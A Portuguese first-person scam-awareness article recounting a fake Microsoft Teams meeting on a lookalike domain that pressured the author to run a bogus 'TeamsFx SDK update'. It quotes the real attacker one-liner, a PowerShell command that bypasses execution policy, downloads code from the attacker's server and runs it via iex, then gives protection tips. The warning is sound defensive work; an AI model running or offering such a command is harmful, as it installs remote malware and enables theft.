Quase fui vítima de um golpe em uma chamada do Microsoft Teams — veja como funciona o golpe

Deixe-me contar como estive a um passo de me tornar vítima de um elaborado esquema de engenharia social, concebido para explorar algo tão rotineiro e aparentemente inofensivo como uma chamada do Microsoft Teams hoje cedo. 

Durante a maior parte da interação, nada pareceu fora do comum. 

Uma pessoa que eu considerava um contato da indústria entrou em contato comigo para agendar uma reunião no Microsoft Teams, e o colaborador nato que existe em mim ficou mais do que feliz em participar da chamada. 

Alerta de spoiler: a pessoa do outro lado da linha era um impostor e tentou me induzir a executar um código malicioso no meu computador. 

Estou relatando toda a experiência aqui como um alerta para amigos, conhecidos e contemporâneos da comunidade de criptomoedas e Web3. 

Hoje quase fui eu; amanhã pode ser outra pessoa. 

Passo 1: A Preparação — “Vamos conversar, meu velho amigo” 

Ao receber uma mensagem de texto da conta do Telegram de alguém que você conhece como um funcionário de alto escalão de uma agência de relações públicas de criptomoedas renomada, a última coisa que lhe vem à mente é que você está caindo em um golpe de phishing. 

Nenhum dos sinais de alerta típicos era imediatamente aparente. 

Essa não foi uma mensagem direta aleatória. 

Eu não estava falando com uma conta falsa onde o "i" é sutilmente substituído por um "l" 

Eu também tinha um histórico de conversas com essa conta, então pensei que estava falando com a pessoa real. 

Nada parecia fora do comum desde o início, quando iniciaram uma conversa totalmente amigável para se reconectarem. Logo depois, surgiu um link do Calendly para agendar uma reunião de 30 minutos e um convite para uma chamada no Microsoft Teams.

Como mencionei anteriormente, meu radar nunca disparou durante toda a interação. Percebi o mesmo nível de profissionalismo e paciência que se espera de um membro da equipe de alto escalão de uma agência de relações públicas de renome. 

Tudo o que eu sabia era que havia agendado uma reunião no Teams a partir da página do Calendly de um contato do setor.

O golpista inicia o contato usando uma conta invadida, enviando um link para uma reunião do Teams.

Etapa 2: A armadilha do "Participar somente pelo computador" 

Chegou o dia da reunião e cliquei no link da reunião do Teams no meu celular, como já fiz pelo menos mil vezes. No entanto, não entrei direto na reunião como de costume. Em vez de ser redirecionado para a chamada, uma tela carregou informando: “O acesso a esta reunião por dispositivos móveis não é permitido devido às configurações do organizador” 

“Ih, rapaz! Isso nunca me aconteceu antes.” 

Bem, também não foi umdent . 

Em retrospectiva, esse foi provavelmente o primeiro sinal de alerta real. 

A tela de erro faz parte do design. Os golpistas precisam que você esteja usando um computador desktop ou laptop porque o código malicioso deles é um script de linha de comando que só funciona em PCs.

O endereço no navegador “ teams.livescalls.com” NÃO é o domínio real da Microsoft.

Reuniões legítimas do Teams usam teams.microsoft.com ou teams.live.com. 

O domínio “livescalls.com” parece bastante semelhante ao original à primeira vista, mas, ao observar com atenção, percebe-se que está longe de ser autêntico. 

Um deles é o site controlado pela Microsoft, que alega ter mais de 320 milhões de usuários ativos diariamente. O outro é um site completamente falso, controlado pelos atacantes. 

Para ser justo, algumas organizações podem usar domínios personalizados para suas reuniões de equipe. No entanto, mais de US$ 1 trilhão em fundos perdidos para golpistas em 2025, de acordo com o Fórum Econômico Mundial, foi motivo suficiente para eu não ignorar minha intuição. 

A página falsa de "Aviso de Acesso da Equipe" bloqueia o acesso móvel, forçando as vítimas a usar um computador desktop, onde o script malicioso pode ser executado. Observe o URL: teams.livescalls.com — não é um domínio da Microsoft.

O golpista pressiona a vítima a participar pelo computador após o bloqueio no celular, alegando que "há parceiros esperando"

Etapa 3: A carga útil — “Atualize seu SDK do TeamsFx”

Ao acessar o site, a reunião simulada do Teams exibia uma página com design profissional, semelhante à encontrada na documentação oficial da Microsoft. Inclusive, incluía informações reais da Microsoft sobre a descontinuação do SDK TeamsFx em setembro de 2025. 

A solução? Copie um bloco de código e execute-o no seu terminal ou prompt de comando.

Se você se desse ao trabalho de pesquisar no Google, descobriria que um SDK semelhante existe. Você só não precisa dele para esta chamada em equipe. 

À primeira vista, o código parece inofensivo — ele define variáveis de ambiente com nomes que soam oficiais, como TeamsFx_API_KEY e MS_Teams_API_SECRET. Mas o verdadeiro vetor de ataque está escondido em algum lugar no meio, e esses atacantes não contam com que você identifique o problema:

powershell -ep bypass -c “(iwr -Uri https://teams.livescalls.com/developer/sdk/update/version/085697307 -UserAgent 'teamsdk' -UseBasicParsing).Content | iex”

Essa única linha de código ignora as políticas de segurança do PowerShell (-ep bypass), baixa o código do servidor do atacante e o executa imediatamente (iex = Invoke-Expression). 

E assim, sem mais nem menos, qualquer malware, keylogger ou ferramenta de acesso remoto que os atacantes tenham hospedado é instalado silenciosamente no seu dispositivo.

Interface falsa de reunião do Teams exibindo a página maliciosa de "atualização do SDK do TeamsFx" para os participantes. Observe os participantes na chamada — vídeos gerados por IA.

Etapa 4: A Fase de Pressão do “Não se preocupe, é seguro”

Quando expressei hesitação em executar o script, o impostor imediatamente me tranquilizou e me pressionou. 

A frase "Não se preocupe, é muito simples e seguro para você" tinha o objetivo de me ajudar a seguir as instruções na captura de tela que mostrava como abrir o Prompt de Comando no meu PC. 

A mensagem "Os parceiros já entraram no Zoom" era para me fazer sentir a pressão de não ter que obrigar todos a mudar de plataforma porque eu não conseguia descobrir como executar um simples Prompt de Comando.

Não me senti tranquilizado. Também não me senti pressionado.

Quando sugeri que transferíssemos a chamada para o Google Meet, eles recusaram. Aparentemente, o golpe deles só funciona por meio da configuração falsa do Teams que eles criaram.

O golpista envia instruções passo a passo para executar o código malicioso, garantindo à vítima: "Não se preocupe, é muito simples e seguro para você."

Passo 5: Blefe descoberto — Bloqueado e excluído

Confirmei minhas suspeitas após verificar o script e o domínio: eu estava sendo vítima de engenharia social e a poucos passos de me tornar parte das estatísticas do Fórum Econômico Mundial de 2026. 

Eu disse diretamente ao golpista: “Acabei de verificar e esse comando e o site não são legítimos. Infelizmente, não poderei fazer isso.” Ofereci-me para continuar a conversa no Google Meet, caso ainda quisessem conversar.

“Mas a reunião já está em andamento”, foi a mensagem do outro lado da linha. 

Como esperado, a resposta deles visava me fazer perceber a urgência de participar da chamada. Afinal, eu não gostaria de deixar todos aqueles parceiros esperando por muito tempo.

Momentos depois, eles apagaram toda a nossa conversa e me bloquearam. 

Ah… Isso não é apenas um sinal de alerta. É algo extremamente preocupante. 

Os contatos comerciais não apagam todo o histórico de conversas e bloqueiam você no momento em que você questiona uma atualização de software.

Após a denúncia do golpe, o atacante insiste que a reunião "está acontecendo agora" antes de apagar todas as mensagens e bloquear a vítima.

Como se proteger

Esse tipo de ataque está se alastrando pelos setores de criptomoedas, Web3 e tecnologia. Golpistas estão comprometendo ou se passando por contas reais de profissionais de relações públicas, investidores e líderes de projetos para atingir indivíduos de alto valor. Veja como se proteger:

• Nunca execute comandos a partir da página de uma reunião. Nenhuma plataforma legítima de videochamadas jamais solicitará que você cole código no terminal ou no prompt de comando.
• Verifique o URL. As reuniões reais do Microsoft Teams acontecem em teams.microsoft.com ou teams.live.com — não em “teams.livescalls.com” ou qualquer outro domínio semelhante.
• Desconfie de requisitos que exigem acesso apenas por computador. Se uma reunião bloqueia o acesso móvel, essa é uma tática deliberada para obrigá-lo a usar um computador onde scripts possam ser executados.
• Verifique a pessoa por meio de um canal separado. Se um contato conhecido lhe enviar um link de reunião incomum, ligue diretamente para ele ou envie uma mensagem por outra plataforma para confirmar.
• Fique atento a comandos como “powershell -ep bypass” e “iex”. Esses são os dois maiores sinais de alerta em qualquer script. O primeiro desativa a segurança, o segundo executa código baixado sem qualquer critério.
• Se você já executou o script: Desconecte-se da internet imediatamente. Execute uma verificação completa de malware (Malwarebytes, Windows Defender Offline). Altere todas as senhas em um dispositivo diferente e limpo. Monitore carteiras de criptomoedas e contas bancárias em busca de transações não autorizadas.

Por que isso é importante para criptomoedas e Web3?

Eu não chamaria isso de uma interação típica de phishing, onde os atacantes lançam redes amplas e veem o que conseguem capturar. 

Não, esta foi uma operação de engenharia social direcionada e que durou vários dias. Os atacantes se fizeram passar por profissionais da área durante dias, criando um vínculo e se preparando para orientá-lo casualmente a resolver um problema técnico em uma chamada do Teams por meio de uma página falsa da Microsoft bastante convincente. 

Quer roubem suasdent, esvaziem sua carteira de criptomoedas ou instalem malware persistente de acesso remoto, os atacantes têm tudo a ganhar e nada a perder. 

Se você é fundador, investidor ou participa de reuniões no universo das criptomoedas e da tecnologia, compartilhe este artigo com sua equipe. Os golpistas estão cada vez mais sofisticados, e a única defesa é a conscientização.